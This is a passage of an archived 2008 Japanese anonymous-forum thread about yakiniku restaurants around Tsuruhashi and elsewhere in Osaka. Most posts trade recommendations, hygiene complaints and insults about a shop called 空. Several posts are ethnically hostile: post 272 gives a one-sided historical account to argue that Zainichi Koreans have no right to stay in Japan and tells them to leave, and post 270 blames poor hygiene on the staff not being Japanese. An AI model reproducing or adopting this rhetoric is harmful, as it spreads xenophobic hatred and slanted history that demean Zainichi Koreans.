迷路の様だw

260 :名無しさん@お腹いっぱい。:2008/05/11(日) 23:00:22 ID:FIlBqbdi
空はいいのだが行列にうんざり。
雰囲気が落ちてもいいから味をキープしてどっかに支店出してくれへんかな。

261 :名無しさん@お腹いっぱい。:2008/05/12(月) 00:29:00 ID:l5XABh4e
難波に支店あるだろ

262 :名無しさん@お腹いっぱい。:2008/05/12(月) 00:35:21 ID:TVG76Ik1
【韓国】「ごみ餃子」波紋、関連業界に拡大
ttp://japan.donga.com/srv/service.php3?biid=2004060858588

>1999年11月から最近まで、W食品から330t(およそ1億7000万相当)の納品を受けたA社は
>「今回摘発された不良具材は米国や日本への輸出用として製造されたため、国内には流通していない」と釈明した。


263 :名無しさん@お腹いっぱい。:2008/05/13(火) 22:07:07 ID:d7BJPfjV
>261

鶴橋のお店と比べて混み具合はどうか知らん?

264 :名無しさん@お腹いっぱい。:2008/05/19(月) 18:38:51 ID:zRbCfjYu
そ○。

店員が食器を洗っていて、洗剤が飛んできて、うちらの焼いてる肉にかかった
(店員は知らんと思うけど)。

食器の洗い方がすごい雑。

肉をもった皿の上に、なんと伝票を置く。

卵スープの中に、スチールたわしの破片が入っていた。

仕事中に酒をがぶ飲みする店員。

とても衛生的とは思えない。
もう行かない。

そ○ですよ、そ○。

p.s
全部実話です。

265 :名無しさん@お腹いっぱい。:2008/05/19(月) 19:15:22 ID:Uf+dlJIE
>>264
ふ〜ん
だから何?って感じだな
大したことないじゃん

神経質なおまえには向いてないから二度と行かなくていいよ

266 :名無しさん@お腹いっぱい。:2008/05/20(火) 01:39:34 ID:Q4KUtDym
>>265

お前の家や食うものは、さぞかし清潔なんだろうな。


267 :名無しさん@お腹いっぱい。:2008/05/20(火) 08:05:03 ID:Yd/sgwYG
>>264
観光客の方ですか?
あなたには牛角の方がおすすめですよw

268 :名無しさん@お腹いっぱい。:2008/05/20(火) 15:40:56 ID:nVpk0rqj
>>264
その場で注意する事もできず匿名掲示板に書き込むヘタレ乙

269 :名無しさん@お腹いっぱい。:2008/05/21(水) 07:48:53 ID:Ufv2IaE5
>268
正論だがその場でそらの店員に注意するのはかなり冒険だぞ。
素性・正体分からないし。。

270 :名無しさん@お腹いっぱい。:2008/05/21(水) 15:33:33 ID:rGn05QEG
>>264
日本人じゃないんだからしゃーない。あそこのキムチの下ごしらえしてるところはそんなもんじゃないぞ。

271 :名無しさん@お腹いっぱい。:2008/05/22(木) 00:02:40 ID:iq4YGkgH
鶴橋で焼肉を食うという事はそうゆう事だ

272 :名無しさん@お腹いっぱい。:2008/05/22(木) 12:34:15 ID:v33vZ/I/



<日本の漁民を人質にして在日特権(永住権)を獲得した韓国>
http://bbs.enjoykorea.jp/tbbs/read.php?board_id=ttalk&nid=955562&tab=five


・1952年、当時の大統領李承晩は国際法のルールを無視し、
 「李承晩ライン」を勝手に引き、そして李承晩ライン内にある竹島を韓国領土だと主張してこれを占領。

・竹島周辺で操業をしていた漁船328隻が拿捕され、3929人もの漁師が抑留。
 その期間は、1965年の李承晩ライン廃止まで13年間。拿捕時に銃撃や追突を受け、44人の死傷者を出す。

・拿捕した漁師を人質に取り、「日韓基本条約」と「日韓法的地位協定」の交渉を有利に進める。

・13年後、1965年、日本と韓国は在日の扱いをどうするかの「日韓基本条約」と「日韓法的地位協定」が結ばれ、
 その結果、在日韓国人に無条件で子々孫々永住が出来る資格が与えられる。


 つまり、在日コリアンが日本にいられる正当な理由はない。

 ましてや、不当な理由で日本に居座り続ける在日早く日本からでていきなさい。



273 :名無しさん@お腹いっぱい。:2008/05/22(木) 19:34:02 ID:fuz6FX3t
>>270

kwsk

274 :名無しさん@お腹いっぱい。:2008/05/23(金) 00:32:57 ID:WtgCwEoo
>>273
店の前の道に目の粗い笊を置いて仕込みしている。でも喰う。
あそこの手伝いのアジュマは日本語が分からないので、小さな方の店で2人だけになるとお互いチト困る。
ビールおかわりとかわかんないし、アジュマも軽く動揺するしw

275 :名無しさん@お腹いっぱい。:2008/05/23(金) 18:48:13 ID:gAcIlQhr
>>274

ありがとう。
やはり不衛生なようですね。

276 :名無しさん@お腹いっぱい。:2008/05/25(日) 08:34:02 ID:3hPx+zfi
確かにあの店は不潔感満点だな。だから、俺も行かないよ。
食べ物を跨ぐなんて、日本人の感覚ではあり得ないね。
ま、行きたい奴は好きにすればいいよ。
それと、信者さんが若干ウザいね。
子供じみたレスは要らないから。

277 :名無しさん@お腹いっぱい。:2008/05/29(木) 01:03:43 ID:Z2JaZUBN
”本家とらちゃん”について教えてください!
おいしいと聞いて今度行こうと考えていますが、今は”一力”と迷っています。
どっちがどうなんでしょう?良心的な意見お願いします!

278 :名無しさん@お腹いっぱい。:2008/06/01(日) 12:02:42 ID:mtD3JmsW
空 はディープでいいな。
たれが味付け濃いからあんまり沢山は食べられへんけど。

279 :名無しさん@お腹いっぱい。:2008/06/09(月) 00:37:45 ID:jGQ4Imda
とらちゃん、おいしかったよ〜

280 :幻の銘牛:2008/06/13(金) 22:42:16 ID:uocobolv

三重の和牛、他府県人が喜ぶは松○牛
地元人が喜ぶは 伊賀牛 ((美´〜`味))モグモグ

http://www.wao.or.jp/maruyo68/runru/mueki/yakiniku/yakiniku.htm



281 :名無しさん@お腹いっぱい。:2008/06/17(火) 10:16:27 ID:slW3jZva
>>277
本家とらちゃん、お店で食べた事ないけど
本家とらちゃんのお肉売っているとこで、骨付きカルビ、ロースなど
もみダレ、つけダレ買ってます

めっちゃ美味しいですよ!
そのうち、お店で食べたいと思っています。

282 :名無しさん@お腹いっぱい。:2008/06/21(土) 17:31:20 ID:+vOgF+Ea
吉田

何となく「焼け太り」した以降、行くのをやめた。
味は確かにイイ。値段はそこそこします。商売人としてはさすが。

283 :名無しさん@お腹いっぱい。:2008/06/25(水) 00:00:21 ID:jlXRWQQd
空に一人焼肉潜入
鶴橋地区では安いし美味かった

284 :名無しさん@お腹いっぱい。:2008/08/08(金) 21:12:31 ID:OgnwpsKH
鶴橋駅前にある白雲台ってヤフーグルメでは評判良いけど、実際のところどうでしょうか?
めったに大阪これないんで、おいしい焼き肉が食べたいです

285 :名無しさん@お腹いっぱい。:2008/08/13(水) 04:16:05 ID:Cu024CSK
空信者ウザイ!ヘタレとか偏屈な叩きはおかしいと思う。人気店だろうが不衛生なのは事実で、空に行った人がそう思って書いた感想だし…
因みに私は道頓堀店に行きましたが、不衛生さが見えてしまいリピはなし。

286 :名無しさん@お腹いっぱい。:2008/08/13(水) 08:06:21 ID:0Rve1yQu
はいはいオマエももう二度と行かなくていいよ

287 :名無しさん@お腹いっぱい。:2008/08/15(金) 01:50:03 ID:dZmVFZeT
空のハチノスは最強やろがッ!

288 :名無しさん@お腹いっぱい。:2008/08/15(金) 08:08:08 ID:yUXbfsCD
衛生面を気にするなら最初から鶴橋には行かないだろJK
神経質なやつの方がウザイ!w

289 :名無しさん@お腹いっぱい。:2008/08/27(水) 21:57:43 ID:2/fZaBwX
1年放置でアガんのか!? テスト


290 :名無しさん@お腹いっぱい。:2008/08/31(日) 00:50:09 ID:BG0G5wc6
>>285
まあ不衛生を目の当たりにしたくないのなら空は駄目だろ。
神経が腐ってる俺でもオイ!と突っ込みたくなる時あるからな。
空が綺麗になったらなったで、文句たれる奴がおるやろうけど・・・
道頓堀の空調直った?目痛いと言われて高い店に逝かされてる俺の立場をなんとか・・



291 :名無しさん@お腹いっぱい。:2008/09/07(日) 15:11:28 ID:ko1DdYeh
不衛生と神経質とは別問題だと思うが

292 :名無しさん@お腹いっぱい。:2008/09/09(火) 20:39:49 ID:1EWmv8pI
焼肉食べ歩き25年 ついに大阪JR天満駅 ガード下の焼肉屋 とみや が最高に気に入った 焼肉53年なのに40年とさば読んだ女将が若手の店長を抜擢し採算度外視の行列薄利多売を展開しとてもお得な感じと
女将の伝統と 日本で初めて和風味噌たれを考案した伝統のたれが気に入った。
韓国たれと全く違うので女将に聞いてみると戦後鶴橋の鶴一の焼肉を研究し 和食職人の先代が違和感のあった韓国たれを
日本人が好むよう カツオ 昆布 たまり醤油 赤味噌などで秘伝の味を作ったそうだ。l
たしかに韓国とは違う和風たれでここの店が元祖でここしかない。
残念なのは7−9時の時間帯は予約と行列で入れないので9時まで漫画喫茶で待たないといけない。
席が空いたら女将が携帯に電話をくれた。
みなさんも絶品味噌たれおめしあがれ

293 :名無しさん@お腹いっぱい。:2008/09/09(火) 22:09:34 ID:xqSE+I4j
塩タンをタン塩と言う奴に腹が立つおれは心がせまいですか?

294 :名無しさん@お腹いっぱい。:2008/09/26(金) 14:47:02 ID:MJLKbN8W

かなりセマイ。



67 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)